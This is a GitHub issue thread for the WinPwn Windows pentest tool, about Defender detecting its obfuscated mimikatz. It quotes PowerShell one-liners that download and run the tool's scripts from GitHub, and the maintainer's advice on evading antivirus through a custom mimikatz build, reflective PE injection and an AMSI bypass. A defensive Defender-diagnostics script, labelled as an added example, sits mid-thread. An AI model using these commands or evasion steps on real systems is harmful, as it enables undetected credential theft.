S3cur3Th1sSh1t / WinPwn

Automation for internal Windows Penetrationtest / AD-Security


Windows Defender blocking obfuscated mimikatz

sp00ks-git opened this issue · comments

When running WinPwn in AMSI - iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/ObfusWinPwn.ps1')

or

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/Obfus_SecurePS_WinPwn.ps1')

Both ways, after selecting option 16, Windows Defender picks up the obfuscated mimikatz version as malicious :-(

Tested on a Windows Server 2016 Standard Edition x64 testbed.

Windows Defender Details:
Antimalware Client Version: 4.18.2004.6
Engine Version: 1.1.17100.2
Antivirus definition: 1.317.173.0
Antispyware definition: 1.317.173.0
Network Inspection System Engine Version: 1.1.17100.2
Network Inspection System Definition Version: 1.317.173.0

Expected behaviour, but I did not think its signature would be caught that fast. Is cloud detection on or off?

Cloud Protection is "on" so as to simulate a real-life scenario.
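For reproducing a report like the one above, it helps to capture the Defender client/engine/signature versions and the cloud-protection state from the same host, and to pull the detection records rather than reading the toast notification. The following is an added example, not code from the WinPwn project or from either participant in this thread; it assumes the built-in Defender PowerShell module (Get-MpComputerStatus, Get-MpPreference, Get-MpThreatDetection, Get-MpThreat), which ships with Windows Server 2016 and Windows 10 and later, and an elevated prompt.

```powershell
# Added example (not part of WinPwn): snapshot the Defender build, signature and
# cloud-protection state, then list recent detections with their threat names.
# Assumes the Defender PowerShell module and an elevated PowerShell session.

function Get-DefenderSnapshot {
    $status = Get-MpComputerStatus
    $pref   = Get-MpPreference

    # MAPSReporting is the "cloud-delivered protection" setting:
    # 0 = Disabled, 1 = Basic, 2 = Advanced
    $maps = switch ($pref.MAPSReporting) {
        0       { 'Disabled' }
        1       { 'Basic' }
        2       { 'Advanced' }
        default { "Unknown ($($pref.MAPSReporting))" }
    }

    # Same fields as the "Windows Defender Details" block in the issue report
    [PSCustomObject]@{
        AntimalwareClientVersion = $status.AMProductVersion
        EngineVersion            = $status.AMEngineVersion
        AntivirusDefinition      = $status.AntivirusSignatureVersion
        AntispywareDefinition    = $status.AntispywareSignatureVersion
        NISEngineVersion         = $status.NISEngineVersion
        NISDefinitionVersion     = $status.NISSignatureVersion
        RealTimeProtection       = $status.RealTimeProtectionEnabled
        CloudProtection          = $maps
        SampleSubmission         = $pref.SubmitSamplesConsent
    }
}

function Get-RecentDefenderDetections {
    param([int]$Minutes = 60)

    $since = (Get-Date).AddMinutes(-$Minutes)

    # Get-MpThreatDetection carries the detection events (when, which process,
    # which files); Get-MpThreat maps the numeric ThreatID to a threat name.
    $names = @{}
    foreach ($t in Get-MpThreat) { $names[$t.ThreatID] = $t.ThreatName }

    Get-MpThreatDetection |
        Where-Object { $_.InitialDetectionTime -ge $since } |
        ForEach-Object {
            [PSCustomObject]@{
                Time       = $_.InitialDetectionTime
                Threat     = $names[$_.ThreatID]
                Process    = $_.ProcessName
                Resources  = ($_.Resources -join '; ')
                Remediated = $_.ActionSuccess
            }
        } |
        Sort-Object Time
}

# Usage: run right after Defender flags the loaded script
Get-DefenderSnapshot | Format-List
Get-RecentDefenderDetections -Minutes 60 | Format-Table -AutoSize
```

The Resources column shows what was actually flagged (the in-memory script block via AMSI versus a file on disk), which is the detail that tells you whether the string replacements or the loader itself tripped the signature; the CloudProtection value answers the "cloud detection on or off?" question directly.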

I won't re-obfuscate the loaded scripts each time they are flagged by a vendor; that would be too much overhead. I will update the mimikatz version from time to time with other string replacements, but it will most likely get flagged again after some days.

If you need an unflagged version, I recommend compiling your own mimikatz version and embedding it in Invoke-ReflectivePEInjection.ps1, which also needs some modification for AMSI bypass afterwards. I have a gist for the mimikatz string replacement.